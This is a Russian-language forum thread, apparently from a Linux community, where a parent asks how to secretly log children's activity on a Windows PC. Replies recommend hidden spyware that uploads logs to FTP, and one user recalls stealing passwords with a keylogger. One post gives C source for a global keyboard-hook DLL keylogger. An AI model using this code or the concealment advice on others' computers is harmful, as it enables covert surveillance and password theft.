Помогите в поиске шпиона (оффтоп)

если мне не изменяет память, данное действие попадает под УК РФ.

Смотря где и как. У себя дома — ни разу не противозаконно, но еретично (Венда? К ЛОРопеду!), у соседа — и еретично и противозаконно.

Жестокий оффтоп. Проще нужный кейлоггер написать самому, благо в винде это не просто, а очень просто. SetWindowsHookEx(WH_KEYBOARD...) и вперед.
Более сложный, но более универсальный метод - написать драйвер, на sysinternals.com готовый пример валяется =)

Да мне трудновато это будет: Ради контроля своих чад писать проги.

Да, они у меня в оффтопике играют... Инетом опять же пользуются из него же. Все никак их не переведу под линь.

> Да мне трудновато это будет: Ради контроля своих чад писать проги.

дядь, я те по секрету скажу - есть клёвый девайс для контроля своих чад. называется он ремень. чес слово, работает так, что никакому кейлогеру и пр. хрени даже не снилось. tested.

// wbr

Если чада не шибко с шаловливыми ручками, то Punto Switcher умеет все нажатия логировать. Только скрыть его как-то потребуется.

Поставь проксю и лови там траффик. А в играх кейлоггер немного словит.

>благо в винде это не просто, а очень просто

Чтобы установить глобальный хук клавиатуры, по понятным причинам, обработчик, устанавливаемый SetWindowsHookEx, нужно поместить в DLL. Это, конечно, просто, но не тривиально, я бы сказал.

Из-под Висты, кстати, это действие, даже если прога запущена из-под админского аккаунта, вызывает диалог повышения привилегий; у каждой программы прописан потому что уровень интеграции в систему, и по-умолчанию он самый низкий, естественно.

>более универсальный метод — написать драйвер

Не факт, если не ограничиваться 32-х битной XP.

actual spy. Поддерживает всё, вплоть до периодического создания скриншотов экрана, логов клавиатуры и посещенных сайтов. Может все отсылать куда нить на ftp. Не видна в процессах, если не пользоваться каким нибудь нормальным procexp.

Могу сдать шпиона - себя. Злобного инопланетного шпиёна, крадущего секреты российской оборонки и продающего альфацентаврайцам и сирианцам за чатлы и кэцэ.

Ох, блин, задал бы ты мне этот вопрос лет шесть-семь назад... Когда единственным моим выходом в инет был университетский комп... С лимитом в сколько-то-там мегабайт на прокси... Вот тогда у меня был кейлогер на дискете (отслеживавший ещё и мышь, как сайд-эффект - я уржался, наблюдая лог игры в сапёра), и маленькая записная книжка с парой сотен чужих паролей... А ты лучше поставь что-нибудь для записи видео с экрана, проще будет.

зукаусе лундщппук

> зукаусе лундщппук

к логопеду! :)

…бырдло? :-)

Всем спасибо!

Идея с прокси понравилась, будем искать. actual spy тоже ищем ;-)

> actual spy тоже ищем ;-)

Не найдешь - напиши в igronus [at] gmail [dot] com

> Идея с прокси понравилась,

С прокси ты сможешь не только проверить, но и попросту забанить ненужные ресурсы.

> А ты лучше поставь что-нибудь для записи видео с экрана, проще будет.

вначале сбегай в магазин за терабайтным винтом :)

а вообще слежка это не дело...

Нахуа? Час видео в приемлемом качестве нормально ужмётся в пару сотен метров. Вряд ли мужику нужно записывать 7x24.

Налету он чтоли ужмется? Если на лету то какой проц для этого нужен?

>SetWindowsHookEx

ага, вспоминая детство и kaht:

#define WM_KEYNOTIFY (WM_APP + 1)

HINSTANCE hInstance;
static HHOOK hhk = NULL;

LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam)
{
        HWND hwndLogger;

        hwndLogger = FindWindowEx(NULL,NULL,"FUCKOFF",NULL);
        if(hwndLogger != NULL)
                if (((DWORD)lParam&0x40000000)&&(code==HC_ACTION))
                       SendNotifyMessage(hwndLogger,WM_KEYNOTIFY,wParam,lParam);

        return CallNextHookEx(hhk, code, wParam, lParam );
}

BOOL WINAPI Uninstall()
{
        BOOL unhooked;
        unhooked = UnhookWindowsHookEx(hhk);
        return unhooked;
}


BOOL WINAPI Install()
{
        hhk=SetWindowsHookEx(WH_KEYBOARD,(HOOKPROC)KeyboardProc,hInstance,0);
        return TRUE;
}

BOOL APIENTRY DllEntryPoint(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
        switch(fdwReason)
        {
        case DLL_PROCESS_ATTACH:
                hInstance = hinstDLL;
                DisableThreadLibraryCalls(hinstDLL);
                break;
        case DLL_THREAD_ATTACH:
                break;
        case DLL_THREAD_DETACH:
                break;
        case DLL_PROCESS_DETACH:
                Uninstall();
                break;
        }
        return TRUE;
}

Не знаю, как с дисплея, но из одного формата в другой видео вполне пережимается в реальном времени.

>Не знаю, как с дисплея, но из одного формата в другой видео вполне пережимается в реальном времени.

Только при этом в игры сложнее сапера не поиграешь.

> Только при этом в игры сложнее сапера не поиграешь.

А неча детям в игры граться, а то вырастают потом из них растения...

Вот у меня сейчас пережимается почти в реальном времени фильм. При этом в огнелисе открыто две строки вкладок. При этом фильм ещё и уменьшается в размерах, причём в нецелое число раз. Тормозов не вижу. Процессор - Intel Core 2 Duo 2 GHz.

> Процессор - Intel Core 2 Duo 2 GHz.

И ты думаешь у всех есть этот маркетинговый монстр?

Ну дык никто не мешает уменьшить fps в два-три раза. Для шпиона - более чем достаточно.